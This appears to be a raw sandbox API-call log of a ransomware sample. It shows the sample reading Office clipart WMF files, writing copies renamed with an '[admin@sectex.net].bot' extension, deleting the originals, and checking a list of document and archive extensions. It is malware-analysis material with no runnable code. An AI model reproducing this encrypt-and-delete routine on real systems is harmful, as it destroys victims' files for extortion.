	[0145.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0145.691] GetLastError () returned 0x0
	[0145.691] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2eda, lpOverlapped=0x0) returned 1
	[0145.693] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2ee0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2ee0, lpOverlapped=0x0) returned 1
	[0145.694] ReadFile (in: hFile=0x38c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.694] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.694] SetEndOfFile (hFile=0x3bc) returned 1
	[0145.695] CloseHandle (hObject=0x3bc) returned 1
	[0145.695] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.695] SetEndOfFile (hFile=0x38c) returned 1
	[0145.697] CloseHandle (hObject=0x38c) returned 1
	[0145.697] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.768] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf")) returned 1
	[0145.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.768] lstrlenW (lpString=".doc") returned 4
	[0145.768] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.768] lstrlenW (lpString=".docx") returned 5
	[0145.769] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.769] lstrlenW (lpString=".pdf") returned 4
	[0145.769] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString=".xls") returned 4
	[0145.769] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.769] lstrlenW (lpString=".xlsx") returned 5
	[0145.769] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.769] lstrlenW (lpString=".ppt") returned 4
	[0145.769] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.769] lstrlenW (lpString=".zip") returned 4
	[0145.769] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.769] lstrlenW (lpString=".rar") returned 4
	[0145.769] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString=".bz2") returned 4
	[0145.769] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString=".7z") returned 3
	[0145.769] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.769] lstrlenW (lpString=".dbf") returned 4
	[0145.769] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.769] lstrlenW (lpString=".1cd") returned 4
	[0145.769] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.769] lstrlenW (lpString=".jpg") returned 4
	[0145.769] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.769] lstrlenW (lpString=".doc") returned 4
	[0145.769] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.769] lstrlenW (lpString=".docx") returned 5
	[0145.769] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.770] lstrlenW (lpString=".pdf") returned 4
	[0145.770] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.770] lstrlenW (lpString=".xls") returned 4
	[0145.770] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.770] lstrlenW (lpString=".xlsx") returned 5
	[0145.770] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.770] lstrlenW (lpString=".ppt") returned 4
	[0145.770] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.770] lstrlenW (lpString=".zip") returned 4
	[0145.770] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.770] lstrlenW (lpString=".rar") returned 4
	[0145.770] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.770] lstrlenW (lpString=".bz2") returned 4
	[0145.770] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.770] lstrlenW (lpString=".7z") returned 3
	[0145.770] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.770] lstrlenW (lpString=".dbf") returned 4
	[0145.770] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.770] lstrlenW (lpString=".1cd") returned 4
	[0145.770] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 63
	[0145.770] lstrlenW (lpString=".jpg") returned 4
	[0145.770] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.770] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.770] lstrlenW (lpString="FD00086_.WMF") returned 12
	[0145.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.791] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=29212) returned 1
	[0145.791] CloseHandle (hObject=0x31c) returned 1
	[0145.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf")) returned 0x20
	[0145.860] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.860] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.860] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.861] GetLastError () returned 0x0
	[0145.861] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x721c, lpOverlapped=0x0) returned 1
	[0145.883] WriteFile (in: hFile=0x3d4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7220, lpOverlapped=0x0) returned 1
	[0145.885] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.885] WriteFile (in: hFile=0x3d4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.885] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.885] CloseHandle (hObject=0x3d4) returned 1
	[0145.885] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.885] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.887] CloseHandle (hObject=0x3a0) returned 1
	[0145.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.888] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00086_.wmf")) returned 1
	[0145.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.888] lstrlenW (lpString=".doc") returned 4
	[0145.888] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.888] lstrlenW (lpString=".docx") returned 5
	[0145.888] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.888] lstrlenW (lpString=".pdf") returned 4
	[0145.888] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.888] lstrlenW (lpString=".xls") returned 4
	[0145.888] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.888] lstrlenW (lpString=".xlsx") returned 5
	[0145.889] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.889] lstrlenW (lpString=".ppt") returned 4
	[0145.889] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.889] lstrlenW (lpString=".zip") returned 4
	[0145.889] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.889] lstrlenW (lpString=".rar") returned 4
	[0145.889] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString=".bz2") returned 4
	[0145.889] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString=".7z") returned 3
	[0145.889] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.889] lstrlenW (lpString=".dbf") returned 4
	[0145.889] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.889] lstrlenW (lpString=".1cd") returned 4
	[0145.889] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.889] lstrlenW (lpString=".jpg") returned 4
	[0145.889] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.889] lstrlenW (lpString=".doc") returned 4
	[0145.889] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString=".docx") returned 5
	[0145.889] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.889] lstrlenW (lpString=".pdf") returned 4
	[0145.889] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.889] lstrlenW (lpString=".xls") returned 4
	[0145.889] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.889] lstrlenW (lpString=".xlsx") returned 5
	[0145.889] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.890] lstrlenW (lpString=".ppt") returned 4
	[0145.890] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.890] lstrlenW (lpString=".zip") returned 4
	[0145.890] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.890] lstrlenW (lpString=".rar") returned 4
	[0145.890] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.890] lstrlenW (lpString=".bz2") returned 4
	[0145.890] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.890] lstrlenW (lpString=".7z") returned 3
	[0145.890] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.890] lstrlenW (lpString=".dbf") returned 4
	[0145.890] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.890] lstrlenW (lpString=".1cd") returned 4
	[0145.890] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 63
	[0145.890] lstrlenW (lpString=".jpg") returned 4
	[0145.890] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.890] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.890] lstrlenW (lpString="FD00306_.WMF") returned 12
	[0145.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.896] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=46814) returned 1
	[0145.896] CloseHandle (hObject=0x3d8) returned 1
	[0145.896] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf")) returned 0x20
	[0145.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.897] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.897] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0145.898] GetLastError () returned 0x0
	[0145.898] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xb6de, lpOverlapped=0x0) returned 1
	[0145.900] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xb6e0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xb6e0, lpOverlapped=0x0) returned 1
	[0145.902] ReadFile (in: hFile=0x3d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.902] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.902] SetEndOfFile (hFile=0x398) returned 1
	[0145.902] CloseHandle (hObject=0x398) returned 1
	[0145.902] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.902] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.905] CloseHandle (hObject=0x3d8) returned 1
	[0145.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.905] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf")) returned 1
	[0145.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.905] lstrlenW (lpString=".doc") returned 4
	[0145.905] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.905] lstrlenW (lpString=".docx") returned 5
	[0145.906] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.906] lstrlenW (lpString=".pdf") returned 4
	[0145.906] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString=".xls") returned 4
	[0145.906] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.906] lstrlenW (lpString=".xlsx") returned 5
	[0145.906] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.906] lstrlenW (lpString=".ppt") returned 4
	[0145.906] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.906] lstrlenW (lpString=".zip") returned 4
	[0145.906] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.906] lstrlenW (lpString=".rar") returned 4
	[0145.906] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString=".bz2") returned 4
	[0145.906] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString=".7z") returned 3
	[0145.906] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.906] lstrlenW (lpString=".dbf") returned 4
	[0145.906] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.906] lstrlenW (lpString=".1cd") returned 4
	[0145.906] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.906] lstrlenW (lpString=".jpg") returned 4
	[0145.906] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.906] lstrlenW (lpString=".doc") returned 4
	[0145.906] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.906] lstrlenW (lpString=".docx") returned 5
	[0145.907] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.907] lstrlenW (lpString=".pdf") returned 4
	[0145.907] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.907] lstrlenW (lpString=".xls") returned 4
	[0145.907] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.907] lstrlenW (lpString=".xlsx") returned 5
	[0145.907] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.907] lstrlenW (lpString=".ppt") returned 4
	[0145.907] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.907] lstrlenW (lpString=".zip") returned 4
	[0145.907] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.907] lstrlenW (lpString=".rar") returned 4
	[0145.907] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.907] lstrlenW (lpString=".bz2") returned 4
	[0145.907] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.907] lstrlenW (lpString=".7z") returned 3
	[0145.907] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.907] lstrlenW (lpString=".dbf") returned 4
	[0145.907] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.907] lstrlenW (lpString=".1cd") returned 4
	[0145.907] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 63
	[0145.907] lstrlenW (lpString=".jpg") returned 4
	[0145.907] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.907] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.907] lstrlenW (lpString="FD00336_.WMF") returned 12
	[0145.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.908] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=6068) returned 1
	[0145.908] CloseHandle (hObject=0x3d8) returned 1
	[0145.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf")) returned 0x20
	[0145.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.908] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.909] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
